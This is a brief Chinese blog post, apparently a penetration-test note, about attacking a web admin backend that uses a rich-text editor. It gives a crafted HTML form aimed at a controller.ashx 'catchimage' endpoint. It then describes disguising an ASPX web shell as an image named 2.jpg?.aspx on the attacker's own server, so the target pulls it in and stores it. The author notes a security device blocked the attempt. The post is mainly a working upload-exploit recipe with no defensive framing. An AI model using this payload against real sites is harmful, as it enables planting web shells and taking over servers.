今天測驗一個專案,進到后臺之后發現使用富文本web編輯器

構造一個惡意的html檔案,方便我們傳輸資料過去: xxxx為攻擊地址
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /> </form>
然后制作一個圖片馬,檔案名改為2.jpg?.aspx上傳至自己的服務器,通過構造的惡意html進行上傳

我的被安全設備攔截了

看看別人成功的案例

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/5097.html
標籤:其他
下一篇:OSI七層模型
